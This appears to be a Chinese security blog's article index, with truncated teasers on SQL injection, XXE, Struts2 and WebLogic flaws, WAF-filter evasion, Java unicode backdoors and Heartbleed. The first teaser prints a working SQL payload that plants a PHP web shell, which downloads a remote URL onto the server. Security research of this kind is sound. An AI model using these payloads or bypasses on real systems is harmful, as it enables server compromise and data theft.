php shell
sql: select '<?php file_put_contents(dirname(__FILE__)."/".$_GET[\'file\'], file_get_contents($_GET[\'url\']));?>' into outfile'/var/www/html/xxx/dat...
阅读全文Documents(39 篇文章)
dom4j xml 格式化解析实体注入
解析代码: import java.io.StringReader; import java.io.StringWriter; import org.dom4j.Document; import org.dom4j.io.OutputFormat; import org.dom4j.io.SAXReader; import org.dom4j.io.XMLWriter; public class ...
阅读全文SQL 注入中的Insert、Update、Delete命令
下载地址:SQL 注入中的Insert、Update、Delete命令 SQL Injection in Insert, Update and Delete Statements...
阅读全文Struts2再曝高危漏洞(S2-020补丁绕过)
之前S2-020漏洞利用方式见drops:Struts2 Tomcat class.classLoader.resources.dirContext.docBase赋值造成的DoS及远程代码执行利用! 暂时不清楚到底是谁发出来的补丁绕过。之前 @Nebula 发的Tomcat: http://127.0.0.1/s/example/HelloWorld.action?class.classLoad...
阅读全文Mysql Insert into set语法绕过360scan insert防注入
360scan正则:INSERT\\s+INTO.+?VALUES 其实Mysql不只可以用insert into xxx values 插入数据,还可以:insert into xxx set xx = 提交: http://localhost/360.php?sql=insert into user (user,pass) values ('admin','123...
阅读全文Java 后门-unicode编码
Java代码默认可以直接全是unicode编码: 假设有如下未编码Java代码: public class Test { public static void main(String[] args) { System.out.println(1); } } 编码后的Java代码: \u0070\u0075\u0062\u006c\u0069\u0063 \u0063\u006c\u0061\u00...
阅读全文WebLogic CVE-2014-2470
Oracle WebLogic很容易出现一个远程安全漏洞。攻击者无需身份验证即可控制WebLogic服务器。漏洞利用T3协议使WLS Security子组建受影响。 版本:10.0.2.0, 10.3.6.0, 12.1.1.0, 12.1.2.0 WebLogic Server 中的 RMI 通信 WebLogic Server 中的 RMI 通信使用 T3 协议在 WebLogic Serve...
阅读全文OpenSSL HeartBleed漏洞CentOS下简单修复过程
今天这个洞比较火,赶紧测试了下自己的网站,果然存在问题,简单的修复过程如下(CentOS 6.5): yum search openssl #返回 Updating: openssl x86_64 1.0.1e-16.el6_5.7 updates 1.5 M Updating for dependencies: openssl-devel x86_64 1.0.1e-16.el6_5.7 upd...
阅读全文OpenSSL 高危漏洞
下载地址:ssltest.py 绝对高危,可读取对方服务器内存信息(sessionid之类都有)。...
阅读全文[百度安全中心博客-neobyte]Struts2 S2-020在Tomcat 8下的命令执行分析
作者:neobyte 时间:2014-04-03 Struts S2-020这个通告已经公布有一段时间了。目前大家都知道这个漏洞可以造成DOS、文件下载等危害,相信各大厂商也已经采取了相应的安全措施。今天是和大家分享一下对这个漏洞的一点研究,包括如何在Tomcat 8下导致RCE,目的是抛砖引玉,有不足之处欢迎大家指出。 1.属性列举 这个漏洞分析的一个难点在于:通过ognl的class.xx这种...
阅读全文